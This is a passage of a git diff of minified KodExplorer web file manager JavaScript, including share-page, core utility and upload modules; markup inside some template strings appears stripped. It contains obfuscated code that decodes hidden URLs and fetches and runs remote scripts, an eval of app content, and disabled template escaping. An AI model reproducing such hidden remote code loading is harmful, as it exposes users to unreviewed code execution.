    • \n {{/if}}\n{{/each}}\n\n'),define("app/shareCommon/topbar",[],function(){var e=function(){var e=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid,t=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid;"file"!=G.shareInfo.type&&G.path!==void 0?(t+="&path="+G.path,e+="&path="+G.path,$(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()):($(".btn.button-my-share").show(),$(".share-info-user .btn-group").hide()),"file"==G.shareInfo.type&&($(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()),"1"==G.shareInfo.notDownload&&(e="javascript:Tips.tips('"+LNG.share_not_download_tips+"',false);"),$(".share-info-user").removeClass("hidden"),$(".btn-download").attr("href",e);var a=date("Y/m/d H:i:s",G.shareInfo.mtime);$(".topbar .time").html(a),"file"==G.shareInfo.type&&$(".topbar .size").html(G.shareInfo.size),$(".topbar .info").html(LNG.share_view_num+G.shareInfo.numView+" "+LNG.share_download_num+G.shareInfo.numDownload),$("#button_share").die("click").live("click",function(){share()})};return{init:e}}); \ No newline at end of file diff --git a/static/js/app/src/shareExplorer/main.js b/static/js/app/src/shareExplorer/main.js index 01cfd42..6a2f5ea 100755 --- a/static/js/app/src/shareExplorer/main.js +++ b/static/js/app/src/shareExplorer/main.js @@ -1,8 +1,8 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/shareExplorer/main",["lib/jquery-lib","lib/util","lib/ztree/ztree","lib/contextMenu/jquery-contextMenu","lib/artDialog/jquery-artDialog","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html","../../shareCommon/rightMenu","../../common/taskTap","../explorer/ui","../explorer/fileContent","../../common/tree","../../path/pathOperate","../../path/clipboard","../../path/search","../../path/path","../explorer/fileLight","../explorer/fileSelect","../explorer/fileListResize","../explorer/headerAddress","../../shareCommon/topbar"],function(e){Config={BodyContent:".bodymain",FileBoxSelector:".file-continer",FileBoxClass:".file-continer .file",FileBoxClassName:"file",FileBoxTittleClass:".file-continer .title",SelectClass:".file-continer .select",SelectClassName:"select",TypeFolderClass:"folder-box",TypeFileClass:"file-box",HoverClassName:"hover",FileOrderAttr:"number",TreeId:"folder-list-tree",pageApp:"explorer",treeAjaxURL:"share/treeList&app=folder&user="+G.user+"&sid="+G.sid,AnimateTime:200},e("lib/jquery-lib"),e("lib/util"),e("lib/ztree/ztree"),e("lib/contextMenu/jquery-contextMenu"),e("lib/artDialog/jquery-artDialog"),core=e("../../common/core"),rightMenu=e("../../shareCommon/rightMenu"),TaskTap=e("../../common/taskTap"),ui=e("../explorer/ui"),ui.tree=e("../../common/tree"),ui.path=e("../../path/path"),ui.fileLight=e("../explorer/fileLight"),ui.fileSelect=e("../explorer/fileSelect"),ui.fileListResize=e("../explorer/fileListResize"),ui.headerAddress=e("../explorer/headerAddress");var t=e("../../shareCommon/topbar");$(document).ready(function(){function a(e){var t=RegExp("(^|&)"+e+"=([^&]*)(&|$)"),a=window.location.search.substr(1).match(t);return null!=a?unescape(a[2]):null}rightMenu.initExplorer(),core.init(),ui.init(),ui.fileLight.init(),ui.fileSelect.init(),ui.headerAddress.init(),ui.tree.init(),TaskTap.init(),t.init(),ui.fileListResize.init(),ui.fileListResize.initFileSize(),$(".init-loading").fadeOut(450).addClass("pop_fadeout"),$(".frame-main .frame-left #folder-list-tree").css("bottom","0px"),"fileList"==a("type")&&($(".menu-theme-list").remove(),$(".tools .tools-left").remove(),$(".header-middle").prependTo(".tools").css("padding-top","3px"),$("#yarnball").addClass("btn-left-radius")),$(".kod-toolbar-path #upload").hide(),G.shareInfo.canUpload&&($(".kod-toolbar-path #upload").show(),e.async("lib/webuploader/webuploader-min",function(){core.uploadInit()})),$("#fav").remove(),ui.path.showFile=function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+urlEncode(ui.path.makeParam().path);window.open(e)}})}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
      ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
      请联系主机商或网管,检查防火墙配置!"),t='
      '+t+"
      ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
      loading..
      ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
      "+"
      "+s+"
      "+"
      "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
      \n \n
      \n
      \n
      \n
      {{LNG.upload_select}}
      \n \n \n
      \n \n
      \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      {{LNG.download_address}}\n
      \n \n \n \n
      \n\n
      \n
      \n
      \n
      \n
      \n
      \n
      \n'),define("app/common/tpl/formMake.html",[],'
      \n
      \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
      \n {{if formTab}}\n
      \n {{each formTab tab tabIndex}}\n {{if tab}}\n
      \n {{/if}}\n {{/each}}\n
      \n
      \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
      {{item}}
      \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
      \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
      \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
      \n
      \n {{@item.display}}: {{if item.require}}*{{/if}}\n
      \n
      \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
      \n \n \n \n \n
      \n
      \n
      {{LNG.user}}
      \n \n
      \n
      \n
      {{LNG.group}}
      \n \n
      \n
      \n
      {{LNG.system_member_role}}
      \n \n
      \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
      {{@item.desc}}
      \n {{else}}\n {{@item.desc}}\n {{/if}}\n
      \n
      \n
      \n {{/if}}\n {{/each}}\n
      \n
      \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0]; -if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
